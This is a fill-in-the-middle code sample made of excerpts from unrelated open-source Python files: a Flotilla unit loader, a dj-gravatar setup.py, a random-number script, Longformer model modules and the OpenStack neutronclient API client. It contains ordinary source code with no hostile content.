unit_revisions[unit].append(rev_hash)
# Fetch every unit:
units = []
unit_keys = [{'unit_hash': unit_hash}
for unit_hash in sorted(unit_revisions.keys())]
logger.debug('Fetching %d units for %d/%d revisions.', len(unit_keys),
len(revisions), len(assigned_revisions))
for unit_item in self._units.batch_get(unit_keys):
env_key = unit_item.get('environment_key')
if env_key:
decrypted_key = self._kms.decrypt(env_key.decode('base64'))
iv = unit_item['environment_iv'].decode('base64')
aes = AES.new(decrypted_key['Plaintext'], AES.MODE_CBC, iv)
ciphertext = unit_item['environment_data'].decode('base64')
plaintext = aes.decrypt(ciphertext)
unit_environment = json.loads(plaintext)
else:<|fim▁hole|> unit_hash = unit.unit_hash
if unit_hash != unit_item['unit_hash']:
logger.warn('Unit hash %s expected %s', unit_hash,
unit_item['unit_hash'])
unit_hash = unit_item['unit_hash']
for revision in unit_revisions[unit_hash]:
rev_unit = FlotillaUnit(unit_item['name'], unit_file,
unit_environment, rev_hash)
units.append(rev_unit)
revisions[revision].units.append(rev_unit)
# Verify each revision matches expected hash:
for expected_hash, revision in revisions.items():
revision_hash = revision.revision_hash
if revision_hash != expected_hash:
# FIXME: enforce?
logger.warn('Revision hash %s expected %s', revision_hash,
expected_hash)
return units<|fim▁end|> | unit_environment = unit_item['environment']
unit_file = unit_item['unit_file']
unit = FlotillaUnit(unit_item['name'], unit_file, unit_environment) |
<|file_name|>setup.py<|end_file_name|><|fim▁begin|>from setuptools import setup, find_packages
import gravatar
<|fim▁hole|> packages=find_packages(),
long_description=open('README.md').read(),
install_requires=[
'Django',
]
)<|fim▁end|> | setup(
name='dj-gravatar',
version=gravatar.__version__, |
<|file_name|>randomword.py<|end_file_name|><|fim▁begin|><|fim▁hole|>#!/usr/bin/env python
import subprocess, random, sys, os
def randomrange():
try:
value1 = int(sys.argv[1])
value2 = int(sys.argv[2])
randvalue = random.randint(value1, value2)
return randvalue
except IndexError:
randvalue = random.randint(0,10000000)
return randvalue
def main():
value = randomrange()
print(value)
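# Hypothetical usage sketch (added for illustration): with two integer
# arguments the script draws from the inclusive range they define;
# otherwise it falls back to [0, 10000000].
#
#   $ python randomword.py 1 100    # prints a value between 1 and 100
#   $ python randomword.py          # prints a value between 0 and 10000000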
main()<|fim▁end|> | |
<|file_name|>longformer.py<|end_file_name|><|fim▁begin|># Copyright 2021 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Longformer modules."""
from flax import nn
import jax.numpy as jnp
from lra_benchmarks.models.layers import common_layers
from lra_benchmarks.models.longformer import longformer_attention
class LongformerBlock(nn.Module):
"""Longformer Layer."""
def apply(self,
inputs,
qkv_dim,
mlp_dim,
num_heads,
sliding_window_size=512,
global_mask=None,
causal_mask=False,
dtype=jnp.float32,
inputs_segmentation=None,
padding_mask=None,
dropout_rate=0.1,
attention_dropout_rate=0.1,
deterministic=False):
"""Applies the LongformerBlock module.
Args:
inputs: input data of size `[bs, seq_len, features]`.
qkv_dim: dimension of the query/key/value.
mlp_dim: dimension of the mlp on top of attention block.
num_heads: number of attention heads.
sliding_window_size: size of sliding window attention to use.
global_mask: boolean matrix of shape `[bs, seq_len]`, where `True`
indicates that the position is globally attended. By default, no global
attention is used.
causal_mask: If true, apply causal attention mask.
dtype: the dtype of the computation (default: float32).
inputs_segmentation: input segmentation info for packed examples.
padding_mask: bool, mask padding tokens.
dropout_rate: dropout rate
attention_dropout_rate: dropout rate for attention weights
deterministic: if true, apply dropout else don't.
Returns:
output of shape `[bs, seq_len, features]`, matching the input.
"""
assert inputs.ndim == 3
x = nn.LayerNorm(inputs)
x = longformer_attention.LongformerSelfAttention(
x,
num_heads=num_heads,
qkv_features=qkv_dim,
sliding_window_size=sliding_window_size,
global_mask=global_mask,
causal_mask=causal_mask,
dtype=dtype,
segmentation=inputs_segmentation,
padding_mask=padding_mask,
kernel_init=nn.initializers.xavier_uniform(),
bias_init=nn.initializers.normal(stddev=1e-6),
bias=False,
broadcast_dropout=False,
dropout_rate=attention_dropout_rate,
deterministic=deterministic)
x = nn.dropout(x, rate=dropout_rate, deterministic=deterministic)
x = x + inputs
y = nn.LayerNorm(x)
y = common_layers.MlpBlock(
y,
mlp_dim=mlp_dim,
dtype=dtype,
dropout_rate=dropout_rate,
deterministic=deterministic)
return x + y
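# Illustrative sketch (added; not from the original file): under flax's
# legacy nn.Module API, LongformerBlock can be initialized roughly as below.
# The shapes, hyperparameters and init call are assumptions for illustration.
#
#   import jax
#   x = jnp.ones((2, 1024, 512))   # [bs, seq_len, features]
#   y, params = LongformerBlock.init(
#       jax.random.PRNGKey(0), x,
#       qkv_dim=512, mlp_dim=2048, num_heads=8, deterministic=True)
#   # y.shape == (2, 1024, 512): the block preserves the input shape.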
class LongformerEncoder(nn.Module):
"""Longformer Encoder."""
def apply(self,
inputs,
vocab_size,
sliding_window_size=512,
global_mask=None,
causal_mask=False,
inputs_positions=None,
inputs_segmentation=None,
shared_embedding=None,
use_bfloat16=False,
emb_dim=512,
num_heads=8,
dtype=jnp.float32,
num_layers=6,
qkv_dim=512,
mlp_dim=2048,
max_len=512,
train=True,
dropout_rate=0.1,
attention_dropout_rate=0.1,
learn_pos_emb=False,
classifier=False,
classifier_pool='CLS',
num_classes=10):
"""Applies Longformer model on the inputs.
Args:
inputs: input data.
vocab_size: size of the vocabulary.
sliding_window_size: size of sliding window attention to use.
global_mask: boolean matrix of shape `[bs, seq_len]`, where `True`
indicates that the position is globally attended. By default, no global
attention is used.
causal_mask: If true, apply causal attention masking.
inputs_positions: input subsequence positions for packed examples.
inputs_segmentation: input segmentation info for packed examples.
shared_embedding: a shared embedding layer to use.
use_bfloat16: bool, whether to use bfloat16.
emb_dim: dimension of embedding
num_heads: number of heads
dtype: the dtype of the computation (default: float32)
num_layers: number of layers
qkv_dim: dimension of the query/key/value
mlp_dim: dimension of the mlp on top of attention block
max_len: maximum length.
train: whether the model is in training mode.
dropout_rate: dropout rate
attention_dropout_rate: dropout rate for attention weights
learn_pos_emb: boolean, if learn the positional embedding or use the
sinusoidal positional embedding.
classifier: boolean, for classification mode (output N-class logits)
classifier_pool: str, pooling mode; supports "CLS", "MEAN" and "MAX".
num_classes: int, number of classification classes.
Returns:
output of the encoder or logits if classifier_mode is true.
"""
assert inputs.ndim == 2 # (batch, len)
# Padding Masks
src_padding_mask = (inputs > 0)[..., None]
# Input Embedding
if shared_embedding is None:
input_embed = nn.Embed.partial(
num_embeddings=vocab_size,
features=emb_dim,
embedding_init=nn.initializers.normal(stddev=1.0))
else:
input_embed = shared_embedding
x = inputs.astype('int32')
x = input_embed(x)
if classifier and classifier_pool == 'CLS':<|fim▁hole|> max_len += 1
src_padding_mask = jnp.concatenate(
[src_padding_mask[:, :1], src_padding_mask], axis=1)
pe_init = nn.initializers.normal(stddev=0.02) if learn_pos_emb else None
x = common_layers.AddPositionEmbs(
x,
inputs_positions=inputs_positions,
posemb_init=pe_init,
max_len=max_len,
name='posembed_input')
x = nn.dropout(x, rate=dropout_rate, deterministic=not train)
if use_bfloat16:
x = x.astype(jnp.bfloat16)
dtype = jnp.bfloat16
else:
dtype = jnp.float32
# Input Encoder
for lyr in range(num_layers):
x = LongformerBlock(
x,
qkv_dim=qkv_dim,
mlp_dim=mlp_dim,
num_heads=num_heads,
sliding_window_size=sliding_window_size,
global_mask=global_mask,
causal_mask=causal_mask,
dtype=dtype,
inputs_segmentation=inputs_segmentation,
padding_mask=src_padding_mask,
dropout_rate=dropout_rate,
attention_dropout_rate=attention_dropout_rate,
deterministic=not train,
name=f'encoderblock_{lyr}')
encoded = nn.LayerNorm(x, dtype=dtype, name='encoder_norm')
if classifier:
encoded = common_layers.classifier_head(
encoded, num_classes, mlp_dim, pooling_mode=classifier_pool)
return encoded
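# Note (added for clarity): when classifier=True and classifier_pool='CLS',
# a learned [CLS] token is prepended and max_len grows by one, so pooling
# happens over seq_len + 1 positions. A hedged sketch of classification
# over integer token ids (shapes and values are assumptions):
#
#   ids = jnp.ones((2, 1024), jnp.int32)   # [bs, seq_len], 0 = padding
#   logits, params = LongformerEncoder.init(
#       jax.random.PRNGKey(0), ids, vocab_size=32000,
#       train=False, classifier=True, num_classes=10)
#   # logits.shape == (2, 10)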
class LongformerDualEncoder(nn.Module):
"""Longformer Model for Matching (dual encoding) tasks."""
def apply(self,
inputs1,
inputs2,
vocab_size=None,
inputs1_positions=None,
inputs2_positions=None,
inputs1_segmentation=None,
inputs2_segmentation=None,
use_bfloat16=False,
emb_dim=512,
num_heads=8,
num_layers=6,
qkv_dim=512,
mlp_dim=2048,
max_len=2048,
train=False,
dropout_rate=0.1,
attention_dropout_rate=0.1,
classifier=True,
classifier_pool='CLS',
num_classes=2,
interaction=None
):
"""Applies Transformer model on text similarity.
This is deliberately kept distinct from NLI because we may want to treat
the two tasks differently later. Dual-encoding mode enforces that there
is no cross attention between the pair of inputs.
Args:
inputs1: input data.
inputs2: target data.
vocab_size: size of the input vocabulary.
inputs1_positions: input subsequence positions for packed examples.
inputs2_positions: target subsequence positions for packed examples.
inputs1_segmentation: input segmentation info for packed examples.
inputs2_segmentation: target segmentation info for packed examples.
use_bfloat16: bool, whether to use bfloat16.
emb_dim: dimension of embedding.
num_heads: number of heads.
num_layers: number of layers.
qkv_dim: dimension of the query/key/value.
mlp_dim: dimension of the mlp on top of attention block.
max_len: maximum length.
train: whether it is training.
dropout_rate: dropout rate.
attention_dropout_rate: dropout rate for attention weights.
classifier: boolean, to use classifier.
classifier_pool: str, pooling mode; supports "CLS", "MEAN" and "MAX".
num_classes: int, number of classification classes.
interaction: str, interaction mode forwarded to the dual-encoder classifier head.
Returns:
logits from the dual-encoder classifier head.
"""
encoder = LongformerEncoder.shared(
inputs_positions=inputs1_positions,
inputs_segmentation=inputs1_segmentation,
vocab_size=vocab_size,
use_bfloat16=use_bfloat16,
emb_dim=emb_dim,
num_heads=num_heads,
num_layers=num_layers,
qkv_dim=qkv_dim,
mlp_dim=mlp_dim,
max_len=max_len,
train=train,
dropout_rate=dropout_rate,
attention_dropout_rate=attention_dropout_rate,
name='encoder')
inputs1_encoded = encoder(inputs1)
inputs2_encoded = encoder(inputs2)
encoded = common_layers.classifier_head_dual(
inputs1_encoded,
inputs2_encoded,
num_classes,
mlp_dim,
pooling_mode=classifier_pool,
interaction=interaction)
return encoded
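# Design note (added): both inputs are encoded by one shared
# LongformerEncoder (LongformerEncoder.shared above), so the two towers
# share parameters; only the classifier head combines the pair, which is
# what keeps this a dual encoder with no cross attention between inputs.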
class LongformerDecoder(nn.Module):
"""Longformer Decoder."""
def apply(self,
inputs,
vocab_size,
sliding_window_size=512,
global_mask=None,
emb_dim=512,
num_heads=8,
dtype=jnp.float32,
num_layers=6,
qkv_dim=512,
mlp_dim=2048,
max_len=2048,
train=False,
shift=True,
dropout_rate=0.1,
attention_dropout_rate=0.1):
"""Applies Longformer model on the inputs, using causal masking.
Args:
inputs: input data
vocab_size: size of the vocabulary
sliding_window_size: size of sliding window attention to use.
global_mask: boolean matrix of shape `[bs, seq_len]`, where `True`
indicates that the position is globally attended. By default, no global
attention is used.
emb_dim: dimension of embedding
num_heads: number of heads
dtype: the dtype of the computation (default: float32)
num_layers: number of layers
qkv_dim: dimension of the query/key/value
mlp_dim: dimension of the mlp on top of attention block
max_len: maximum length.
train: bool, whether the model is training.
shift: bool, whether to right-shift the input; this is only disabled
for fast, looped single-token autoregressive decoding.
dropout_rate: dropout rate
attention_dropout_rate: dropout rate for attention weights
Returns:
output of a transformer decoder.
"""
padding_mask = jnp.where(inputs > 0, 1, 0).astype(jnp.float32)[..., None]
assert inputs.ndim == 2 # (batch, len)
x = inputs
if shift:
x = common_layers.shift_right(x)
x = x.astype('int32')
x = common_layers.Embed(
x, num_embeddings=vocab_size, features=emb_dim, name='embed')
x = common_layers.AddPositionEmbs(
x,
max_len=max_len,
posemb_init=common_layers.sinusoidal_init(max_len=max_len),
cache=None)
x = nn.dropout(x, rate=dropout_rate, deterministic=not train)
for _ in range(num_layers):
x = LongformerBlock(
x,
qkv_dim=qkv_dim,
mlp_dim=mlp_dim,
num_heads=num_heads,
sliding_window_size=sliding_window_size,
global_mask=global_mask,
causal_mask=True,
padding_mask=padding_mask,
dropout_rate=dropout_rate,
attention_dropout_rate=attention_dropout_rate,
deterministic=not train,
cache=None,
)
x = nn.LayerNorm(x)
logits = nn.Dense(
x,
vocab_size,
kernel_init=nn.initializers.xavier_uniform(),
bias_init=nn.initializers.normal(stddev=1e-6))
return logits<|fim▁end|> | cls = self.param('cls', (1, 1, emb_dim), nn.initializers.zeros)
cls = jnp.tile(cls, [x.shape[0], 1, 1])
x = jnp.concatenate([cls, x], axis=1) |
<|file_name|>client.py<|end_file_name|><|fim▁begin|># Copyright 2012 OpenStack Foundation.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import logging
import time
import urllib
import requests
import six.moves.urllib.parse as urlparse
from neutronclient import client
from neutronclient.common import _
from neutronclient.common import constants
from neutronclient.common import exceptions
from neutronclient.common import serializer
from neutronclient.common import utils
_logger = logging.getLogger(__name__)
def exception_handler_v20(status_code, error_content):
"""Exception handler for API v2.0 client.
This routine generates the appropriate Neutron exception according to
the contents of the response body.
:param status_code: HTTP error status code
:param error_content: deserialized body of error response
"""
error_dict = None
if isinstance(error_content, dict):
error_dict = error_content.get('NeutronError')
# Find real error type
bad_neutron_error_flag = False
if error_dict:
# If the NeutronError key is present it should contain 'message'
# and 'type' keys, but guard against malformed bodies just in case.
try:
error_type = error_dict['type']
error_message = error_dict['message']
if error_dict['detail']:
error_message += "\n" + error_dict['detail']
except Exception:
bad_neutron_error_flag = True
if not bad_neutron_error_flag:
# If corresponding exception is defined, use it.
client_exc = getattr(exceptions, '%sClient' % error_type, None)
# Otherwise look up per status-code client exception
if not client_exc:
client_exc = exceptions.HTTP_EXCEPTION_MAP.get(status_code)
if client_exc:
raise client_exc(message=error_message,
status_code=status_code)
else:
raise exceptions.NeutronClientException(
status_code=status_code, message=error_message)
else:
raise exceptions.NeutronClientException(status_code=status_code,
message=error_dict)
else:
message = None
if isinstance(error_content, dict):
message = error_content.get('message')
if message:
raise exceptions.NeutronClientException(status_code=status_code,
message=message)
# If we end up here, the exception was not a Neutron error
msg = "%s-%s" % (status_code, error_content)
raise exceptions.NeutronClientException(status_code=status_code,
message=msg)
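# Illustrative sketch (added; not part of the original module): a
# deserialized 404 body such as the hypothetical payload
#
#   {'NeutronError': {'type': 'NetworkNotFound',
#                     'message': 'Network abc could not be found',
#                     'detail': ''}}
#
# resolves to exceptions.NetworkNotFoundClient if such a class exists,
# otherwise to the HTTP_EXCEPTION_MAP entry for 404, and finally to a
# generic NeutronClientException.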
class APIParamsCall(object):
"""A Decorator to add support for format and tenant overriding and filters.
"""
def __init__(self, function):
self.function = function
def __get__(self, instance, owner):
def with_params(*args, **kwargs):
_format = instance.format
if 'format' in kwargs:
instance.format = kwargs['format']
ret = self.function(instance, *args, **kwargs)
instance.format = _format
return ret
return with_params
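# Illustrative sketch (added): because APIParamsCall swaps self.format in
# and out around the wrapped call, a single request can override the
# serialization format without permanently mutating the client, e.g.
# (hypothetical usage):
#
#   client.list_networks(format='xml')   # this one call uses XML
#   client.list_networks()               # later calls keep the default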
class Client(object):
"""Client for the OpenStack Neutron v2.0 API.
:param string username: Username for authentication. (optional)
:param string user_id: User ID for authentication. (optional)
:param string password: Password for authentication. (optional)
:param string token: Token for authentication. (optional)
:param string tenant_name: Tenant name. (optional)
:param string tenant_id: Tenant id. (optional)
:param string auth_url: Keystone service endpoint for authorization.
:param string service_type: Network service type to pull from the
keystone catalog (e.g. 'network') (optional)
:param string endpoint_type: Network service endpoint type to pull from the
keystone catalog (e.g. 'publicURL',
'internalURL', or 'adminURL') (optional)
:param string region_name: Name of a region to select when choosing an
endpoint from the service catalog.
:param string endpoint_url: A user-supplied endpoint URL for the neutron
service. Lazy-authentication is possible for API
service calls if endpoint is set at
instantiation. (optional)
:param integer timeout: Allows customization of the timeout for client
http requests. (optional)
:param bool insecure: SSL certificate validation. (optional)
:param string ca_cert: SSL CA bundle file to use. (optional)
:param integer retries: How many times idempotent (GET, PUT, DELETE)
requests to Neutron server should be retried if
they fail (default: 0).
:param bool raise_errors: If True then exceptions caused by connection
failure are propagated to the caller.
(default: True)
:param session: Keystone client auth session to use. (optional)
:param auth: Keystone auth plugin to use. (optional)
Example::
from neutronclient.v2_0 import client
neutron = client.Client(username=USER,
password=PASS,
tenant_name=TENANT_NAME,
auth_url=KEYSTONE_URL)
nets = neutron.list_networks()
...
"""
networks_path = "/networks"
network_path = "/networks/%s"
ports_path = "/ports"
port_path = "/ports/%s"
subnets_path = "/subnets"
subnet_path = "/subnets/%s"
quotas_path = "/quotas"
quota_path = "/quotas/%s"
extensions_path = "/extensions"
extension_path = "/extensions/%s"
routers_path = "/routers"
router_path = "/routers/%s"
floatingips_path = "/floatingips"
floatingip_path = "/floatingips/%s"
security_groups_path = "/security-groups"
security_group_path = "/security-groups/%s"
security_group_rules_path = "/security-group-rules"
security_group_rule_path = "/security-group-rules/%s"
vpnservices_path = "/vpn/vpnservices"
vpnservice_path = "/vpn/vpnservices/%s"
ipsecpolicies_path = "/vpn/ipsecpolicies"
ipsecpolicy_path = "/vpn/ipsecpolicies/%s"
ikepolicies_path = "/vpn/ikepolicies"
ikepolicy_path = "/vpn/ikepolicies/%s"
ipsec_site_connections_path = "/vpn/ipsec-site-connections"
ipsec_site_connection_path = "/vpn/ipsec-site-connections/%s"
vips_path = "/lb/vips"
vip_path = "/lb/vips/%s"
pools_path = "/lb/pools"
pool_path = "/lb/pools/%s"
pool_path_stats = "/lb/pools/%s/stats"
members_path = "/lb/members"
member_path = "/lb/members/%s"
health_monitors_path = "/lb/health_monitors"
health_monitor_path = "/lb/health_monitors/%s"
associate_pool_health_monitors_path = "/lb/pools/%s/health_monitors"
disassociate_pool_health_monitors_path = (
"/lb/pools/%(pool)s/health_monitors/%(health_monitor)s")
qos_queues_path = "/qos-queues"
qos_queue_path = "/qos-queues/%s"
agents_path = "/agents"
agent_path = "/agents/%s"
network_gateways_path = "/network-gateways"
network_gateway_path = "/network-gateways/%s"
gateway_devices_path = "/gateway-devices"
gateway_device_path = "/gateway-devices/%s"
service_providers_path = "/service-providers"
credentials_path = "/credentials"
credential_path = "/credentials/%s"
network_profiles_path = "/network_profiles"
network_profile_path = "/network_profiles/%s"
network_profile_bindings_path = "/network_profile_bindings"
policy_profiles_path = "/policy_profiles"
policy_profile_path = "/policy_profiles/%s"
policy_profile_bindings_path = "/policy_profile_bindings"
metering_labels_path = "/metering/metering-labels"
metering_label_path = "/metering/metering-labels/%s"
metering_label_rules_path = "/metering/metering-label-rules"
metering_label_rule_path = "/metering/metering-label-rules/%s"
packet_filters_path = "/packet_filters"
packet_filter_path = "/packet_filters/%s"
DHCP_NETS = '/dhcp-networks'
DHCP_AGENTS = '/dhcp-agents'
L3_ROUTERS = '/l3-routers'
L3_AGENTS = '/l3-agents'
LOADBALANCER_POOLS = '/loadbalancer-pools'
LOADBALANCER_AGENT = '/loadbalancer-agent'
firewall_rules_path = "/fw/firewall_rules"
firewall_rule_path = "/fw/firewall_rules/%s"
firewall_policies_path = "/fw/firewall_policies"
firewall_policy_path = "/fw/firewall_policies/%s"
firewall_policy_insert_path = "/fw/firewall_policies/%s/insert_rule"
firewall_policy_remove_path = "/fw/firewall_policies/%s/remove_rule"
firewalls_path = "/fw/firewalls"
firewall_path = "/fw/firewalls/%s"
net_partitions_path = "/net-partitions"
net_partition_path = "/net-partitions/%s"
# API has no way to report plurals, so we have to hard code them
EXTED_PLURALS = {'routers': 'router',
'floatingips': 'floatingip',
'service_types': 'service_type',
'service_definitions': 'service_definition',
'security_groups': 'security_group',
'security_group_rules': 'security_group_rule',
'ipsecpolicies': 'ipsecpolicy',
'ikepolicies': 'ikepolicy',
'ipsec_site_connections': 'ipsec_site_connection',
'vpnservices': 'vpnservice',
'vips': 'vip',
'pools': 'pool',
'members': 'member',
'health_monitors': 'health_monitor',
'quotas': 'quota',
'service_providers': 'service_provider',
'firewall_rules': 'firewall_rule',
'firewall_policies': 'firewall_policy',
'firewalls': 'firewall',
'metering_labels': 'metering_label',
'metering_label_rules': 'metering_label_rule',
'net_partitions': 'net_partition',
'packet_filters': 'packet_filter',
}
# 8192 is the default max URI length for eventlet.wsgi.server
MAX_URI_LEN = 8192
def get_attr_metadata(self):
if self.format == 'json':
return {}
old_request_format = self.format
self.format = 'json'
exts = self.list_extensions()['extensions']
self.format = old_request_format
ns = dict([(ext['alias'], ext['namespace']) for ext in exts])
self.EXTED_PLURALS.update(constants.PLURALS)
return {'plurals': self.EXTED_PLURALS,
'xmlns': constants.XML_NS_V20,
constants.EXT_NS: ns}
@APIParamsCall
def get_quotas_tenant(self, **_params):
"""Fetch tenant info in server's context for following quota operation.
"""
return self.get(self.quota_path % 'tenant', params=_params)
@APIParamsCall
def list_quotas(self, **_params):
"""Fetch all tenants' quotas."""
return self.get(self.quotas_path, params=_params)
@APIParamsCall
def show_quota(self, tenant_id, **_params):
"""Fetch information of a certain tenant's quotas."""
return self.get(self.quota_path % (tenant_id), params=_params)
@APIParamsCall
def update_quota(self, tenant_id, body=None):
"""Update a tenant's quotas."""
return self.put(self.quota_path % (tenant_id), body=body)
@APIParamsCall
def delete_quota(self, tenant_id):
"""Delete the specified tenant's quota values."""
return self.delete(self.quota_path % (tenant_id))
@APIParamsCall
def list_extensions(self, **_params):
"""Fetch a list of all exts on server side."""
return self.get(self.extensions_path, params=_params)
@APIParamsCall
def show_extension(self, ext_alias, **_params):
"""Fetch a list of all exts on server side."""
return self.get(self.extension_path % ext_alias, params=_params)
@APIParamsCall
def list_ports(self, retrieve_all=True, **_params):
"""Fetches a list of all networks for a tenant."""
# Pass filters in "params" argument to do_request
return self.list('ports', self.ports_path, retrieve_all,
**_params)
@APIParamsCall
def show_port(self, port, **_params):
"""Fetches information of a certain network."""
return self.get(self.port_path % (port), params=_params)
@APIParamsCall
def create_port(self, body=None):
"""Creates a new port."""
return self.post(self.ports_path, body=body)
@APIParamsCall
def update_port(self, port, body=None):
"""Updates a port."""
return self.put(self.port_path % (port), body=body)
@APIParamsCall
def delete_port(self, port):
"""Deletes the specified port."""
return self.delete(self.port_path % (port))
@APIParamsCall
def list_networks(self, retrieve_all=True, **_params):
"""Fetches a list of all networks for a tenant."""
# Pass filters in "params" argument to do_request
return self.list('networks', self.networks_path, retrieve_all,
**_params)
@APIParamsCall
def show_network(self, network, **_params):
"""Fetches information of a certain network."""
return self.get(self.network_path % (network), params=_params)
@APIParamsCall
def create_network(self, body=None):
"""Creates a new network."""
return self.post(self.networks_path, body=body)
@APIParamsCall
def update_network(self, network, body=None):
"""Updates a network."""
return self.put(self.network_path % (network), body=body)
@APIParamsCall
def delete_network(self, network):
"""Deletes the specified network."""
return self.delete(self.network_path % (network))
@APIParamsCall
def list_subnets(self, retrieve_all=True, **_params):
"""Fetches a list of all networks for a tenant."""
return self.list('subnets', self.subnets_path, retrieve_all,
**_params)
@APIParamsCall
def show_subnet(self, subnet, **_params):
"""Fetches information of a certain subnet."""
return self.get(self.subnet_path % (subnet), params=_params)
@APIParamsCall
def create_subnet(self, body=None):
"""Creates a new subnet."""
return self.post(self.subnets_path, body=body)
@APIParamsCall
def update_subnet(self, subnet, body=None):
"""Updates a subnet."""
return self.put(self.subnet_path % (subnet), body=body)
@APIParamsCall
def delete_subnet(self, subnet):
"""Deletes the specified subnet."""
return self.delete(self.subnet_path % (subnet))
@APIParamsCall
def list_routers(self, retrieve_all=True, **_params):
"""Fetches a list of all routers for a tenant."""
# Pass filters in "params" argument to do_request
return self.list('routers', self.routers_path, retrieve_all,
**_params)
@APIParamsCall
def show_router(self, router, **_params):
"""Fetches information of a certain router."""
return self.get(self.router_path % (router), params=_params)
@APIParamsCall
def create_router(self, body=None):
"""Creates a new router."""
return self.post(self.routers_path, body=body)
@APIParamsCall
def update_router(self, router, body=None):
"""Updates a router."""
return self.put(self.router_path % (router), body=body)
@APIParamsCall
def delete_router(self, router):
"""Deletes the specified router."""
return self.delete(self.router_path % (router))
@APIParamsCall
def add_interface_router(self, router, body=None):
"""Adds an internal network interface to the specified router."""
return self.put((self.router_path % router) + "/add_router_interface",
body=body)
@APIParamsCall
def remove_interface_router(self, router, body=None):
"""Removes an internal network interface from the specified router."""
return self.put((self.router_path % router) +
"/remove_router_interface", body=body)
@APIParamsCall
def add_gateway_router(self, router, body=None):
"""Adds an external network gateway to the specified router."""
return self.put((self.router_path % router),
body={'router': {'external_gateway_info': body}})
@APIParamsCall
def remove_gateway_router(self, router):
"""Removes an external network gateway from the specified router."""
return self.put((self.router_path % router),
body={'router': {'external_gateway_info': {}}})
@APIParamsCall
def list_floatingips(self, retrieve_all=True, **_params):
"""Fetches a list of all floatingips for a tenant."""
# Pass filters in "params" argument to do_request
return self.list('floatingips', self.floatingips_path, retrieve_all,
**_params)
@APIParamsCall
def show_floatingip(self, floatingip, **_params):
"""Fetches information of a certain floatingip."""
return self.get(self.floatingip_path % (floatingip), params=_params)
@APIParamsCall
def create_floatingip(self, body=None):
"""Creates a new floatingip."""
return self.post(self.floatingips_path, body=body)
@APIParamsCall
def update_floatingip(self, floatingip, body=None):
"""Updates a floatingip."""
return self.put(self.floatingip_path % (floatingip), body=body)
@APIParamsCall
def delete_floatingip(self, floatingip):
"""Deletes the specified floatingip."""
return self.delete(self.floatingip_path % (floatingip))
@APIParamsCall
def create_security_group(self, body=None):
"""Creates a new security group."""
return self.post(self.security_groups_path, body=body)
@APIParamsCall
def update_security_group(self, security_group, body=None):
"""Updates a security group."""
return self.put(self.security_group_path %
security_group, body=body)
@APIParamsCall
def list_security_groups(self, retrieve_all=True, **_params):
"""Fetches a list of all security groups for a tenant."""
return self.list('security_groups', self.security_groups_path,
retrieve_all, **_params)
@APIParamsCall
def show_security_group(self, security_group, **_params):
"""Fetches information of a certain security group."""
return self.get(self.security_group_path % (security_group),
params=_params)
@APIParamsCall
def delete_security_group(self, security_group):
"""Deletes the specified security group."""
return self.delete(self.security_group_path % (security_group))
@APIParamsCall
def create_security_group_rule(self, body=None):
"""Creates a new security group rule."""
return self.post(self.security_group_rules_path, body=body)
@APIParamsCall
def delete_security_group_rule(self, security_group_rule):
"""Deletes the specified security group rule."""
return self.delete(self.security_group_rule_path %
(security_group_rule))
@APIParamsCall
def list_security_group_rules(self, retrieve_all=True, **_params):
"""Fetches a list of all security group rules for a tenant."""
return self.list('security_group_rules',
self.security_group_rules_path,
retrieve_all, **_params)
@APIParamsCall
def show_security_group_rule(self, security_group_rule, **_params):
"""Fetches information of a certain security group rule."""
return self.get(self.security_group_rule_path % (security_group_rule),
params=_params)
@APIParamsCall
def list_vpnservices(self, retrieve_all=True, **_params):
"""Fetches a list of all configured VPN services for a tenant."""
return self.list('vpnservices', self.vpnservices_path, retrieve_all,
**_params)
@APIParamsCall
def show_vpnservice(self, vpnservice, **_params):
"""Fetches information of a specific VPN service."""
return self.get(self.vpnservice_path % (vpnservice), params=_params)
@APIParamsCall
def create_vpnservice(self, body=None):
"""Creates a new VPN service."""
return self.post(self.vpnservices_path, body=body)
@APIParamsCall
def update_vpnservice(self, vpnservice, body=None):
"""Updates a VPN service."""
return self.put(self.vpnservice_path % (vpnservice), body=body)
@APIParamsCall
def delete_vpnservice(self, vpnservice):
"""Deletes the specified VPN service."""
return self.delete(self.vpnservice_path % (vpnservice))
@APIParamsCall
def list_ipsec_site_connections(self, retrieve_all=True, **_params):
"""Fetches all configured IPsecSiteConnections for a tenant."""
return self.list('ipsec_site_connections',
self.ipsec_site_connections_path,
retrieve_all,
**_params)
@APIParamsCall
def show_ipsec_site_connection(self, ipsecsite_conn, **_params):
"""Fetches information of a specific IPsecSiteConnection."""
return self.get(
self.ipsec_site_connection_path % (ipsecsite_conn), params=_params
)
@APIParamsCall
def create_ipsec_site_connection(self, body=None):
"""Creates a new IPsecSiteConnection."""
return self.post(self.ipsec_site_connections_path, body=body)
@APIParamsCall
def update_ipsec_site_connection(self, ipsecsite_conn, body=None):
"""Updates an IPsecSiteConnection."""
return self.put(
self.ipsec_site_connection_path % (ipsecsite_conn), body=body
)
@APIParamsCall
def delete_ipsec_site_connection(self, ipsecsite_conn):
"""Deletes the specified IPsecSiteConnection."""
return self.delete(self.ipsec_site_connection_path % (ipsecsite_conn))
@APIParamsCall
def list_ikepolicies(self, retrieve_all=True, **_params):
"""Fetches a list of all configured IKEPolicies for a tenant."""
return self.list('ikepolicies', self.ikepolicies_path, retrieve_all,
**_params)
@APIParamsCall
def show_ikepolicy(self, ikepolicy, **_params):
"""Fetches information of a specific IKEPolicy."""
return self.get(self.ikepolicy_path % (ikepolicy), params=_params)
@APIParamsCall
def create_ikepolicy(self, body=None):
"""Creates a new IKEPolicy."""
return self.post(self.ikepolicies_path, body=body)
@APIParamsCall
def update_ikepolicy(self, ikepolicy, body=None):
"""Updates an IKEPolicy."""
return self.put(self.ikepolicy_path % (ikepolicy), body=body)
@APIParamsCall
def delete_ikepolicy(self, ikepolicy):
